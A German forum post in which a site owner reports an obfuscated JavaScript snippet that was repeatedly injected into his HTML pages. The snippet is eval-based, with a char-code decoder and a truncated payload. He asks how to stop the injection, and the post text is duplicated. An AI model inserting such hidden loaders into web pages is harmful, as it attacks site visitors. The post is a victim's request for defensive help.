Peter Schneider
Legendäres Mitglied
Meine Seiten enthalten alle Extra-Code. In diesem Stil. Ich kürze den Code hier aber:
CODE <!--c3284d--><script>try{abgraebg++}catch(ratntndrt){try{1512|htxhgrnegbr}catch(fzgnergz){e=window["eva"+"l"]}}
if(1){f=[91,105,97,88,104,92,100,98,....,85,103];}w=f;s=[];r=String;for(i=0;-i+1771!=0;i+=1){j=i;s=s+r.fromCharCode((w[j]*1+e("j"+"%"+3)+11));}
if(012===10)e("if(1)"+s);</script><!--/c3284d-->
Ich kann aussschliessen, dass
a) der Extra-Code auf meinem Lokalen Rechner vorhanden ist
b) mein SFTP-Programm korrumpiert ist [da File-Transfer auf mein 2.-Hosting woanders nicht betroffen ist]?
bzw. die Files, die ich gerade überschrieben habe, den extra-Code nicht aufweisen.
c) irgendein CMS oder Software mit bekannten Sicherheitslöchern verwendet werden. +/- [Im Prinzip liegen die Seiten in html vor und enthalten wenige PHP-Includes. Datenbanken und Formulare werden keine verwendet]
Folgende Massnahmen habe ich durchgeführt: alle Dateien überschrieben, FTP-Zugriff lahmgelegt und den Support kontaktiert.
Gibt es noch Möglichkeiten?
Ich kann jetzt einfach noch sporadisch überprüfen, ob dieser Extra-Code wieder eingefügt wird, da der Support im Wochende steckt... Aber sonst?
Das Unangenehme ist, In WMT und z.B. im Firefox werden die Seiten als "attackierend" angezeigt. Dadurch verliere ich gerade massiv Nutzer. Glücklicherweise hat Google noch nicht alle betroffenen Websites entdeckt, so dass ich ein paar davon rechtzeitig korrigieren konnte.
CODE <!--c3284d--><script>try{abgraebg++}catch(ratntndrt){try{1512|htxhgrnegbr}catch(fzgnergz){e=window["eva"+"l"]}}
if(1){f=[91,105,97,88,104,92,100,98,....,85,103];}w=f;s=[];r=String;for(i=0;-i+1771!=0;i+=1){j=i;s=s+r.fromCharCode((w[j]*1+e("j"+"%"+3)+11));}
if(012===10)e("if(1)"+s);</script><!--/c3284d-->
Ich kann aussschliessen, dass
a) der Extra-Code auf meinem Lokalen Rechner vorhanden ist
b) mein SFTP-Programm korrumpiert ist [da File-Transfer auf mein 2.-Hosting woanders nicht betroffen ist]?
bzw. die Files, die ich gerade überschrieben habe, den extra-Code nicht aufweisen.
c) irgendein CMS oder Software mit bekannten Sicherheitslöchern verwendet werden. +/- [Im Prinzip liegen die Seiten in html vor und enthalten wenige PHP-Includes. Datenbanken und Formulare werden keine verwendet]
Folgende Massnahmen habe ich durchgeführt: alle Dateien überschrieben, FTP-Zugriff lahmgelegt und den Support kontaktiert.
Gibt es noch Möglichkeiten?
Ich kann jetzt einfach noch sporadisch überprüfen, ob dieser Extra-Code wieder eingefügt wird, da der Support im Wochende steckt... Aber sonst?
Das Unangenehme ist, In WMT und z.B. im Firefox werden die Seiten als "attackierend" angezeigt. Dadurch verliere ich gerade massiv Nutzer. Glücklicherweise hat Google noch nicht alle betroffenen Websites entdeckt, so dass ich ein paar davon rechtzeitig korrigieren konnte.